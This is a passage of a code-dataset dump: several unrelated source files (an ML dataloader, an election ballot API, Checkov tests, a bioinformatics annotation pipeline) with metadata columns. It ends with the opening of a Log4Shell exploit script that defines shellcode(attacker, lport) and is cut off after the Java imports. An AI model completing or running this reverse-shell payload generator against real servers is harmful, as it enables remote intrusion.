from paww.dataloader import PawwDataset
def get_dataloader(cfg):
train = pd.read_csv("data/petfinder-pawpularity-score/train.csv")
def get_train_file_path(image_id):
return "data/petfinder-pawpularity-score/train/{}.jpg".format(image_id)
train["file_path"] = train["Id"].apply(get_train_file_path)
num_bins = int(np.floor(1 + np.log2(len(train))))
train["bins"] = pd.cut(train[cfg["target_col"]], bins=num_bins, labels=False)
Fold = StratifiedKFold(
n_splits=cfg["folds"], shuffle=True, random_state=cfg["seed"]
)
for n, (train_index, val_index) in enumerate(Fold.split(train, train["bins"])):
train.loc[val_index, "fold"] = int(n)
train["fold"] = train["fold"].astype(int)
trn_idx = train[train["fold"] != 0].index
train_folds = train.loc[trn_idx].reset_index(drop=True)
train_dataset = PawwDataset(
cfg, train_folds, transform=get_transforms(cfg, data="train")
)
dataloader = DataLoader(
train_dataset,
batch_size=cfg["batch_size"],
shuffle=True,
num_workers=cfg["num_workers"],
pin_memory=True,
drop_last=True,
)
return dataloader
| none | 1 | 2.256552 | 2 | |
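A hypothetical configuration for get_dataloader in the record above; only the keys read in that file are listed, the values are placeholders, and PawwDataset/get_transforms may expect additional keys.

cfg = {
    "target_col": "Pawpularity",  # assumed Kaggle target column
    "folds": 5,
    "seed": 42,
    "batch_size": 32,
    "num_workers": 4,
}
# dataloader = get_dataloader(cfg)  # needs the petfinder CSV and images on disk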
app/ballot.py | RIT-Election-Security/SAVI-ballotserver | 0 | 6616667 | <filename>app/ballot.py<gh_stars>0
from electionguard.ballot import PlaintextBallot
from electionguard.group import int_to_q
from fastapi import APIRouter
from pydantic import BaseModel
from uuid import uuid4
import hashlib
import json
import os.path
from .election import election
from .manifest import generate_ballot_style_contests, get_contest_info, get_selection_info
from .config import STORAGE_DIR, RECEIVED_HASH_FILE, store_hash
router = APIRouter()
class BallotInfoRequest(BaseModel):
ballot_style: str
class BallotMarkingRequest(BaseModel):
ballot_style: str
selections: dict
class BallotEncryptionRequest(BaseModel):
ballot: dict
action: str
class BallotChallengeRequest(BaseModel):
verification_code: str
@router.post("/info")
async def gen_ballot_info(ballot_info_params: BallotInfoRequest):
"""
Given a ballot style, compile and return relevant election information
Args:
        ballot_info_params: BallotInfoRequest containing ballot style
Returns:
        JSON structure for the ballot_style, with contest info returned from get_contest_info
"""
# Get base ballot info
ballot_info = generate_ballot_style_contests(election.manifest, ballot_info_params.ballot_style)
for contest in ballot_info["contests"]:
# Get contest info
contest_info = get_contest_info(election.manifest, contest["object_id"])
# Populate information
contest.update(contest_info)
return ballot_info
@router.post("/mark")
async def mark_ballot(ballot_marking_params: BallotMarkingRequest):
"""
Mark all selections on a ballot.
Args:
ballot_marking_params: ballot_style and voter selections
Returns:
Marked ballot JSON returned by get_selection_info()
TODO: handle errors gracefully
TODO: check number of votes and weights
"""
# Get base ballot info
ballot = generate_ballot_style_contests(election.manifest, ballot_marking_params.ballot_style)
# Give ballot unique ID
ballot["object_id"] = f"ballot-{uuid4()}"
    # Mark each selection
for contest in ballot["contests"]:
contest_id = contest["object_id"]
selected_candidate_id = ballot_marking_params.selections.get(contest_id)
selection_info = get_selection_info(election.manifest, contest_id, selected_candidate_id)
contest["ballot_selections"] = [selection_info]
return ballot
@router.post("/submit")
async def encrypt_ballot(ballot_encryption_params: BallotEncryptionRequest):
"""
Encrypt a ballot and generate a receipt
Args:
ballot_encryption_params: ballot JSON
Returns:
receipt JSON with verification code, hashes, and timestamp
"""
# Assert that action is valid before processing ballot
assert ballot_encryption_params.action == "CAST" or ballot_encryption_params.action == "SPOIL"
# ballot_encryption_params.ballot is a dict, which we convert to a JSON string
# call .encode() on the string and feed it into sha256
unenc_hash = hashlib.sha256(json.dumps(ballot_encryption_params.ballot).encode()).hexdigest()
# Make and encrypt ballot object
ballot = PlaintextBallot.from_json_object(ballot_encryption_params.ballot)
encrypted_ballot = election.encryption_mediator.encrypt(ballot)
# the ballot type has a function to run it through sha256 with something prepended to it
# this returns an ElementModQ, a variety of BigInteger, which has .to_hex() to make a hex string
enc_hash = encrypted_ballot.crypto_hash_with(int_to_q(0)).to_hex()
# Cast or spoil ballot depending on action
if ballot_encryption_params.action == "CAST":
election.ballotbox.cast(encrypted_ballot)
store_hash(enc_hash, RECEIVED_HASH_FILE)
else:
election.ballotbox.spoil(encrypted_ballot)
# Return verification code and timestamp
return {
"verification_code": encrypted_ballot.object_id,
"timestamp": encrypted_ballot.timestamp,
"unenc_hash": unenc_hash,
"enc_hash": enc_hash
}
@router.post("/challenge")
async def challenge(ballot_challenge_request: BallotChallengeRequest):
challenged = election.challenge_ballot(ballot_challenge_request.verification_code)
if challenged:
ballot = {
"ballot_id": challenged.object_id,
"contests": [
{
"object_id": contest.object_id,
"ballot_selections": [
{
"object_id": selection.object_id,
"tally": selection.tally
}
for selection in contest.selections.values() if selection.tally > 0
]
}
for contest in challenged.contests.values()
]
}
else:
ballot = {}
return ballot
@router.get("/hashes")
async def get_received_hashes():
"""
Get the hash of every ballot that was received
:return: JSON array with all the hashes as strings
"""
with open(os.path.join(STORAGE_DIR, RECEIVED_HASH_FILE), "r") as f:
contents = f.read()
return {"hashes": contents.splitlines()} | <filename>app/ballot.py<gh_stars>0
from electionguard.ballot import PlaintextBallot
from electionguard.group import int_to_q
from fastapi import APIRouter
from pydantic import BaseModel
from uuid import uuid4
import hashlib
import json
import os.path
from .election import election
from .manifest import generate_ballot_style_contests, get_contest_info, get_selection_info
from .config import STORAGE_DIR, RECEIVED_HASH_FILE, store_hash
router = APIRouter()
class BallotInfoRequest(BaseModel):
ballot_style: str
class BallotMarkingRequest(BaseModel):
ballot_style: str
selections: dict
class BallotEncryptionRequest(BaseModel):
ballot: dict
action: str
class BallotChallengeRequest(BaseModel):
verification_code: str
@router.post("/info")
async def gen_ballot_info(ballot_info_params: BallotInfoRequest):
"""
Given a ballot style, compile and return relevant election information
Args:
        ballot_info_params: BallotInfoRequest containing ballot style
Returns:
        JSON structure for the ballot_style, with contest info returned from get_contest_info
"""
# Get base ballot info
ballot_info = generate_ballot_style_contests(election.manifest, ballot_info_params.ballot_style)
for contest in ballot_info["contests"]:
# Get contest info
contest_info = get_contest_info(election.manifest, contest["object_id"])
# Populate information
contest.update(contest_info)
return ballot_info
@router.post("/mark")
async def mark_ballot(ballot_marking_params: BallotMarkingRequest):
"""
Mark all selections on a ballot.
Args:
ballot_marking_params: ballot_style and voter selections
Returns:
Marked ballot JSON returned by get_selection_info()
TODO: handle errors gracefully
TODO: check number of votes and weights
"""
# Get base ballot info
ballot = generate_ballot_style_contests(election.manifest, ballot_marking_params.ballot_style)
# Give ballot unique ID
ballot["object_id"] = f"ballot-{uuid4()}"
    # Mark each selection
for contest in ballot["contests"]:
contest_id = contest["object_id"]
selected_candidate_id = ballot_marking_params.selections.get(contest_id)
selection_info = get_selection_info(election.manifest, contest_id, selected_candidate_id)
contest["ballot_selections"] = [selection_info]
return ballot
@router.post("/submit")
async def encrypt_ballot(ballot_encryption_params: BallotEncryptionRequest):
"""
Encrypt a ballot and generate a receipt
Args:
ballot_encryption_params: ballot JSON
Returns:
receipt JSON with verification code, hashes, and timestamp
"""
# Assert that action is valid before processing ballot
assert ballot_encryption_params.action == "CAST" or ballot_encryption_params.action == "SPOIL"
# ballot_encryption_params.ballot is a dict, which we convert to a JSON string
# call .encode() on the string and feed it into sha256
unenc_hash = hashlib.sha256(json.dumps(ballot_encryption_params.ballot).encode()).hexdigest()
# Make and encrypt ballot object
ballot = PlaintextBallot.from_json_object(ballot_encryption_params.ballot)
encrypted_ballot = election.encryption_mediator.encrypt(ballot)
# the ballot type has a function to run it through sha256 with something prepended to it
# this returns an ElementModQ, a variety of BigInteger, which has .to_hex() to make a hex string
enc_hash = encrypted_ballot.crypto_hash_with(int_to_q(0)).to_hex()
# Cast or spoil ballot depending on action
if ballot_encryption_params.action == "CAST":
election.ballotbox.cast(encrypted_ballot)
store_hash(enc_hash, RECEIVED_HASH_FILE)
else:
election.ballotbox.spoil(encrypted_ballot)
# Return verification code and timestamp
return {
"verification_code": encrypted_ballot.object_id,
"timestamp": encrypted_ballot.timestamp,
"unenc_hash": unenc_hash,
"enc_hash": enc_hash
}
@router.post("/challenge")
async def challenge(ballot_challenge_request: BallotChallengeRequest):
challenged = election.challenge_ballot(ballot_challenge_request.verification_code)
if challenged:
ballot = {
"ballot_id": challenged.object_id,
"contests": [
{
"object_id": contest.object_id,
"ballot_selections": [
{
"object_id": selection.object_id,
"tally": selection.tally
}
for selection in contest.selections.values() if selection.tally > 0
]
}
for contest in challenged.contests.values()
]
}
else:
ballot = {}
return ballot
@router.get("/hashes")
async def get_received_hashes():
"""
Get the hash of every ballot that was received
:return: JSON array with all the hashes as strings
"""
with open(os.path.join(STORAGE_DIR, RECEIVED_HASH_FILE), "r") as f:
contents = f.read()
return {"hashes": contents.splitlines()} | en | 0.798159 | Given a ballot style, compile and return relevant election information Args: ballot_info_paramse: BallotInfoRequest containing ballot style Returns: JSON structure for ballot_style with returned from get_contest_info # Get base ballot info # Get contest info # Populate information Mark all selections on a ballot. Args: ballot_marking_params: ballot_style and voter selections Returns: Marked ballot JSON returned by get_selection_info() TODO: handle errors gracefully TODO: check number of votes and weights # Get base ballot info # Give ballot unique ID # Mark mark each selection Encrypt a ballot and generate a receipt Args: ballot_encryption_params: ballot JSON Returns: receipt JSON with verification code, hashes, and timestamp # Assert that action is valid before processing ballot # ballot_encryption_params.ballot is a dict, which we convert to a JSON string # call .encode() on the string and feed it into sha256 # Make and encrypt ballot object # the ballot type has a function to run it through sha256 with something prepended to it # this returns an ElementModQ, a variety of BigInteger, which has .to_hex() to make a hex string # Cast or spoil ballot depending on action # Return verification code and timestamp Get the hash of every ballot that was received :return: JSON array with all the hashes as strings | 2.60331 | 3 |
scripts/get_siteinfo.py | HAKSOAT/python-mwtext | 4 | 6616668 | <gh_stars>1-10
from mwapi.session import Session
wiki_host = "https://en.wikipedia.org"
session = Session(wiki_host, user_agent="mwtext scripts get_siteinfo")
doc = session.get(
action="query",
meta="siteinfo",
siprop=["namespaces", "namespacealiases", "general"],
formatversion=2
)
siteinfo = doc["query"]
| from mwapi.session import Session
wiki_host = "https://en.wikipedia.org"
session = Session(wiki_host, user_agent="mwtext scripts get_siteinfo")
doc = session.get(
action="query",
meta="siteinfo",
siprop=["namespaces", "namespacealiases", "general"],
formatversion=2
)
siteinfo = doc["query"] | none | 1 | 2.370214 | 2 | |
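A sketch of consuming the siteinfo payload from the record above; the sample dict mirrors the usual formatversion=2 shape (namespaces keyed by id, each with a name field), but exact fields vary by wiki, so treat it as an assumption.

sample_siteinfo = {
    "general": {"sitename": "Wikipedia"},
    "namespaces": {"0": {"id": 0, "name": ""}, "1": {"id": 1, "name": "Talk"}},
}

def namespace_names(siteinfo):
    # Map namespace id to its display name.
    return {ns["id"]: ns["name"] for ns in siteinfo["namespaces"].values()}

print(namespace_names(sample_siteinfo))  # {0: '', 1: 'Talk'}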
tests/terraform/runner/test_plan_runner.py | soufiane444/checkov | 1 | 6616669 | import os
import unittest
from checkov.runner_filter import RunnerFilter
from checkov.terraform.plan_runner import Runner
class TestRunnerValid(unittest.TestCase):
def test_runner_two_checks_only(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan/tfplan.json"
runner = Runner()
checks_allowlist = ['CKV_AWS_21']
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all', checks=checks_allowlist))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
for record in report.failed_checks:
self.assertIn(record.check_id, checks_allowlist)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 3)
def test_runner_child_modules(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan_with_child_modules/tfplan.json"
runner = Runner()
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 4)
def test_runner_root_dir(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = current_dir + "/resources"
runner = Runner()
report = runner.run(root_folder=root_dir, files=None, external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(41, report.get_summary()["failed"])
self.assertEqual(60, report.get_summary()["passed"])
files_scanned = list(set(map(lambda rec: rec.file_path, report.failed_checks)))
self.assertGreaterEqual(2, len(files_scanned))
if __name__ == '__main__':
unittest.main()
| import os
import unittest
from checkov.runner_filter import RunnerFilter
from checkov.terraform.plan_runner import Runner
class TestRunnerValid(unittest.TestCase):
def test_runner_two_checks_only(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan/tfplan.json"
runner = Runner()
checks_allowlist = ['CKV_AWS_21']
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all', checks=checks_allowlist))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
for record in report.failed_checks:
self.assertIn(record.check_id, checks_allowlist)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 3)
def test_runner_child_modules(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan_with_child_modules/tfplan.json"
runner = Runner()
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 4)
def test_runner_root_dir(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = current_dir + "/resources"
runner = Runner()
report = runner.run(root_folder=root_dir, files=None, external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(41, report.get_summary()["failed"])
self.assertEqual(60, report.get_summary()["passed"])
files_scanned = list(set(map(lambda rec: rec.file_path, report.failed_checks)))
self.assertGreaterEqual(2, len(files_scanned))
if __name__ == '__main__':
unittest.main()
| none | 1 | 2.222093 | 2 | |
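Outside the tests in the record above, the same runner can be driven directly; this sketch is left commented out because it needs checkov installed and a plan exported with terraform show -json, and the plan file name is a placeholder.

# from checkov.runner_filter import RunnerFilter
# from checkov.terraform.plan_runner import Runner
#
# report = Runner().run(root_folder=None, files=["tfplan.json"], external_checks_dir=None,
#                       runner_filter=RunnerFilter(framework="all", checks=["CKV_AWS_21"]))
# print(report.get_summary())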
src/worker_entrypoint.py | thijsmie/tantalus | 3 | 6616670 | <gh_stars>1-10
import logging
import os
import sys
directory = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, directory)
from tantalus.appfactory.main import create_app
flask, app = create_app()
logging.basicConfig(level=logging.INFO)
app.work() | import logging
import os
import sys
directory = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, directory)
from tantalus.appfactory.main import create_app
flask, app = create_app()
logging.basicConfig(level=logging.INFO)
app.work() | none | 1 | 1.948847 | 2 | |
annotation.py | MaxiEstravis/lenga | 0 | 6616671 | <filename>annotation.py<gh_stars>0
# coding=utf-8
import os
import re
import sys
import time
####### FUNCTION DEFINITIONS #######
def open_file(x): # opens a file given as an absolute or relative path
a = open(x).read().splitlines()
return a
def names(o): # returns a list containing sequences' names
s = open(o).read()
names = re.findall(">.+\n",s)
return names
def sep_seq(o): # returns a list containing 6 grouped peptid sequences by contig (its translation for each frame)
s = open(o).read()
seqs = re.split(">.+\n",s)
seqs.pop(0)
sep = [seqs[x:x+6] for x in range(0,len(seqs),6)]
return sep
def split_orfs(l): # splits ORFs for each frame translation for each contig
split = [[[] for x in range(6)] for x in range(len(l))]
for i in l:
ind = l.index(i)
indf = int((float(ind)/float(len(l)))*100)
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
if ind%3000 == 0:
print "Splitting ORFs: ", indf, "%"
for s in i:
split[l.index(i)][i.index(s)] = s.split("*")
return split
def longest_orf(l): # finds the longest ORF per frame
longest = []
for h in l:
for i in h:
if i:
longest.append(max(i,key = len))
else:
longest.append("ERROR")
ind = l.index(h)
indf = int((float(ind)/float(len(l)))*100)
if ind%3000 == 0:
print "Assigning longest ORF per frame: ", indf, "%"
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
return longest
def join(n,s): # reunites each frame's name with its longest ORF
tot = []
for i in n:
ind = n.index(i)
indf = int((float(ind)/float(len(n)))*100)
tot.append(n[ind]+s[ind])
if ind%5000 == 0:
print "Rejoining names and sequences: ", indf, "%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return tot
def annotation(ss,nn): # annotates the dataset ss with reference nn
for i in ss:
for j in nn:
if i[1] in j[0]:
i.append(j[1])
ind = ss.index(i)
indf = int((float(ind)/float(len(ss)))*100)
if ind%5000 == 0:
print "Performing annotation:", indf,"%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return ss
######## STATEMENTS ########
fasta = sys.argv[1]
ref_blat = sys.argv[2]
blat = sys.argv[3]
transeq = sys.argv[4]
merge = sys.argv[5]
print("STARTING ANNOTATION PIPELINE FOR %s" % fasta)
pep = fasta[:-6]+'_six_frames.pep'
query_blat = pep[:-4]+'_longest_clean.pep'
result_blat = query_blat[:-4]+'_vs_prot.psl'
def_file = fasta[:-6]+'_def'
sorted_file = fasta[:-6]+'_clean_sorted'
os.system(transeq+' '+fasta+' '+pep+' -frame=6') ######## the translation
print("\n\n\t\tTranslated data file: %s\n\n" % pep)
seq_names = names(pep)
sep = sep_seq(pep)
split = split_orfs(sep)
print "\n\n\t\tORF splitting done\n\n"
for i in split:
if i == [[] for x in range(6)]:
ll = [sep[split.index(i)],sep[split.index(i)+1]]
        split2 = split_orfs(ll)  # re-split the ORFs for this contig and its neighbour
split[split.index(i)] = split2[0]
longest = longest_orf(split) ############ longest ORF selection
print "\n\n\t\tLongest ORF selection done\n\n"
seq_clean = [re.sub('\n','',i) for i in longest]
tot = join(seq_names, seq_clean)
with open(query_blat,'a') as file:
for i in tot:
print >> file, i
print("\n\n\t\tLongest ORF per frame file: %s\n\n" % query_blat)
print "\n\n\t\tStarting BLAT\n\n"
os.system('%s -oneOff=1 -noHead -prot %s %s %s' % (blat, ref_blat, query_blat, result_blat)) ######### blat
print("\n\n\t\tBLAT done: result %s\n\n" % result_blat)
os.system('php %s %s > %s' % (merge, result_blat, result_blat+'_merge')) ######## blat correction
n1 = names(ref_blat)
n = [re.sub('\n','',i) for i in n1]
n2 = [re.sub('>','',i) for i in n]
nn = [re.split(' ',i,maxsplit = 1) for i in n2] #### prepares the reference for annotation
q = [re.split('\t',i) for i in open_file(result_blat+'_merge')]
ssa = annotation(q,nn) ##### annotation
print "\n\n\t\tANNOTATION DONE\n\n"
### arranging and sorting of annotation
ss2 = [i[:7] if len(i)>7 else i for i in ssa]
sep = [i for i in ss2 if len(i) == 7]
query_id = [i[0] for i in sep]
target_id = [i[1] for i in sep]
query_len = [i[2] for i in sep]
target_len = [i[3] for i in sep]
align_len = [i[4] for i in sep]
score = [i[5] for i in sep]
target_anot = [i[6] for i in sep]
id_2 = [i[3:] for i in target_id]
target_id = [re.sub('\|.+$','',i) for i in id_2]
target_os = [re.split('=',i[-1])[1][:-3] for i in ssa]
target_short = [re.split('=',i[-1])[0][:-3] for i in ssa]
frames = [re.findall("[\d]$",i) for i in query_id]
frames_def = [''.join(i) for i in frames]
new = [query_id[i][:-2]+'\t'+frames_def[i]+'\t'+score[i]+'\t'+target_id[i]+'\t'+target_len[i]+'\t'+target_short[i]+'\t'+target_os[i] for i in range(len(score))]
with open(fasta[:-6]+'_clean_presorted','a') as file:
for i in new:
print >> file, i
os.system('sort -k1,1 -k2,2 -k3,3 %s > %s' % (fasta[:-6]+'_clean_presorted',sorted_file))
os.system('rm %s' % fasta[:-6]+'_clean_presorted')
print("\n\n\t\tAnnotated and sorted file: %s\n\n" % sorted_file)
###
### best hit selection
neww = [re.sub('\t','',i,count = 1) for i in open_file(sorted_file)]
sepp = [re.split('\t',i) for i in neww]
for i in sepp:
i[1] = float(i[1])
i[3] = int(i[3])
lil = [[sepp[0]]]
for li in sepp[1:]:
if li[0] == lil[-1][-1][0]:
lil[-1].append(li)
else:
lil.append([li])
single = [i[-1] for i in lil]
single_sep = [[a[0][:-1],a[0][-1],a[1],a[2],a[3],a[4],a[5]] for a in single]
single_sep_unique = [[single_sep[0]]]
for li in single_sep[1:]:
if li[0] == single_sep_unique[-1][-1][0]:
single_sep_unique[-1].append(li)
else:
single_sep_unique.append([li])
single_def = []
for i in single_sep_unique:
if len(i) == 1:
single_def.append(i)
elif len(i) == 2:
if i[0][2]>i[1][2]:
single_def.append(i[0])
else:
single_def.append(i[1])
elif len(i) == 3:
if i[0][2]>i[1][2] and i[0][2]>i[2][2]:
single_def.append(i[0])
elif i[1][2]>i[0][2] and i[1][2]>i[2][2]:
single_def.append(i[1])
elif i[2][2]>i[0][2] and i[2][2]>i[1][2]:
single_def.append(i[2])
else:
print "\nTied contig: ", i, "\n"
else:
print "\nContig with more than 3 frames in blat: ", i, "\n"
single_deff = [i[0] if type(i[0]) == list else i for i in single_def]
for i in single_deff:
i[2]=str(i[2])
i[4]=str(i[4])
def_tab = ['\t'.join(i) for i in single_deff]
with open(def_file,'a') as file:
for i in def_tab:
print >> file, i
print("\n\n\t\tFINAL ANNOTATED FILE: %s\n\n" % def_file)
| <filename>annotation.py<gh_stars>0
# coding=utf-8
import os
import re
import sys
import time
####### FUNCTION DEFINITIONS #######
def open_file(x): # opens a file given as an absolute or relative path
a = open(x).read().splitlines()
return a
def names(o): # returns a list containing sequences' names
s = open(o).read()
names = re.findall(">.+\n",s)
return names
def sep_seq(o): # returns a list containing 6 grouped peptid sequences by contig (its translation for each frame)
s = open(o).read()
seqs = re.split(">.+\n",s)
seqs.pop(0)
sep = [seqs[x:x+6] for x in range(0,len(seqs),6)]
return sep
def split_orfs(l): # splits ORFs for each frame translation for each contig
split = [[[] for x in range(6)] for x in range(len(l))]
for i in l:
ind = l.index(i)
indf = int((float(ind)/float(len(l)))*100)
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
if ind%3000 == 0:
print "Splitting ORFs: ", indf, "%"
for s in i:
split[l.index(i)][i.index(s)] = s.split("*")
return split
def longest_orf(l): # finds the longest ORF per frame
longest = []
for h in l:
for i in h:
if i:
longest.append(max(i,key = len))
else:
longest.append("ERROR")
ind = l.index(h)
indf = int((float(ind)/float(len(l)))*100)
if ind%3000 == 0:
print "Assigning longest ORF per frame: ", indf, "%"
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
return longest
def join(n,s): # reunites each frame's name with its longest ORF
tot = []
for i in n:
ind = n.index(i)
indf = int((float(ind)/float(len(n)))*100)
tot.append(n[ind]+s[ind])
if ind%5000 == 0:
print "Rejoining names and sequences: ", indf, "%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return tot
def annotation(ss,nn): # annotates the dataset ss with reference nn
for i in ss:
for j in nn:
if i[1] in j[0]:
i.append(j[1])
ind = ss.index(i)
indf = int((float(ind)/float(len(ss)))*100)
if ind%5000 == 0:
print "Performing annotation:", indf,"%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return ss
######## STATEMENTS ########
fasta = sys.argv[1]
ref_blat = sys.argv[2]
blat = sys.argv[3]
transeq = sys.argv[4]
merge = sys.argv[5]
print("STARTING ANNOTATION PIPELINE FOR %s" % fasta)
pep = fasta[:-6]+'_six_frames.pep'
query_blat = pep[:-4]+'_longest_clean.pep'
result_blat = query_blat[:-4]+'_vs_prot.psl'
def_file = fasta[:-6]+'_def'
sorted_file = fasta[:-6]+'_clean_sorted'
os.system(transeq+' '+fasta+' '+pep+' -frame=6') ######## the translation
print("\n\n\t\tTranslated data file: %s\n\n" % pep)
seq_names = names(pep)
sep = sep_seq(pep)
split = split_orfs(sep)
print "\n\n\t\tORF splitting done\n\n"
for i in split:
if i == [[] for x in range(6)]:
ll = [sep[split.index(i)],sep[split.index(i)+1]]
        split2 = split_orfs(ll)  # re-split the ORFs for this contig and its neighbour
split[split.index(i)] = split2[0]
longest = longest_orf(split) ############ longest ORF selection
print "\n\n\t\tLongest ORF selection done\n\n"
seq_clean = [re.sub('\n','',i) for i in longest]
tot = join(seq_names, seq_clean)
with open(query_blat,'a') as file:
for i in tot:
print >> file, i
print("\n\n\t\tLongest ORF per frame file: %s\n\n" % query_blat)
print "\n\n\t\tStarting BLAT\n\n"
os.system('%s -oneOff=1 -noHead -prot %s %s %s' % (blat, ref_blat, query_blat, result_blat)) ######### blat
print("\n\n\t\tBLAT done: result %s\n\n" % result_blat)
os.system('php %s %s > %s' % (merge, result_blat, result_blat+'_merge')) ######## blat correction
n1 = names(ref_blat)
n = [re.sub('\n','',i) for i in n1]
n2 = [re.sub('>','',i) for i in n]
nn = [re.split(' ',i,maxsplit = 1) for i in n2] #### prepares the reference for annotation
q = [re.split('\t',i) for i in open_file(result_blat+'_merge')]
ssa = annotation(q,nn) ##### annotation
print "\n\n\t\tANNOTATION DONE\n\n"
### arranging and sorting of annotation
ss2 = [i[:7] if len(i)>7 else i for i in ssa]
sep = [i for i in ss2 if len(i) == 7]
query_id = [i[0] for i in sep]
target_id = [i[1] for i in sep]
query_len = [i[2] for i in sep]
target_len = [i[3] for i in sep]
align_len = [i[4] for i in sep]
score = [i[5] for i in sep]
target_anot = [i[6] for i in sep]
id_2 = [i[3:] for i in target_id]
target_id = [re.sub('\|.+$','',i) for i in id_2]
target_os = [re.split('=',i[-1])[1][:-3] for i in ssa]
target_short = [re.split('=',i[-1])[0][:-3] for i in ssa]
frames = [re.findall("[\d]$",i) for i in query_id]
frames_def = [''.join(i) for i in frames]
new = [query_id[i][:-2]+'\t'+frames_def[i]+'\t'+score[i]+'\t'+target_id[i]+'\t'+target_len[i]+'\t'+target_short[i]+'\t'+target_os[i] for i in range(len(score))]
with open(fasta[:-6]+'_clean_presorted','a') as file:
for i in new:
print >> file, i
os.system('sort -k1,1 -k2,2 -k3,3 %s > %s' % (fasta[:-6]+'_clean_presorted',sorted_file))
os.system('rm %s' % fasta[:-6]+'_clean_presorted')
print("\n\n\t\tAnnotated and sorted file: %s\n\n" % sorted_file)
###
### best hit selection
neww = [re.sub('\t','',i,count = 1) for i in open_file(sorted_file)]
sepp = [re.split('\t',i) for i in neww]
for i in sepp:
i[1] = float(i[1])
i[3] = int(i[3])
lil = [[sepp[0]]]
for li in sepp[1:]:
if li[0] == lil[-1][-1][0]:
lil[-1].append(li)
else:
lil.append([li])
single = [i[-1] for i in lil]
single_sep = [[a[0][:-1],a[0][-1],a[1],a[2],a[3],a[4],a[5]] for a in single]
single_sep_unique = [[single_sep[0]]]
for li in single_sep[1:]:
if li[0] == single_sep_unique[-1][-1][0]:
single_sep_unique[-1].append(li)
else:
single_sep_unique.append([li])
single_def = []
for i in single_sep_unique:
if len(i) == 1:
single_def.append(i)
elif len(i) == 2:
if i[0][2]>i[1][2]:
single_def.append(i[0])
else:
single_def.append(i[1])
elif len(i) == 3:
if i[0][2]>i[1][2] and i[0][2]>i[2][2]:
single_def.append(i[0])
elif i[1][2]>i[0][2] and i[1][2]>i[2][2]:
single_def.append(i[1])
elif i[2][2]>i[0][2] and i[2][2]>i[1][2]:
single_def.append(i[2])
else:
print "\nTied contig: ", i, "\n"
else:
print "\nContig with more than 3 frames in blat: ", i, "\n"
single_deff = [i[0] if type(i[0]) == list else i for i in single_def]
for i in single_deff:
i[2]=str(i[2])
i[4]=str(i[4])
def_tab = ['\t'.join(i) for i in single_deff]
with open(def_file,'a') as file:
for i in def_tab:
print >> file, i
print("\n\n\t\tFINAL ANNOTATED FILE: %s\n\n" % def_file)
main.py | ishan-saha/LOG4SHELL | 2 | 6616672 | <gh_stars>1-10
#!/usr/bin/env python3
import sys, os
from colorama import Fore, Back, Style
import requests
import multiprocessing
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
def shellcode(attacker , lport):
shellcode ='''import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
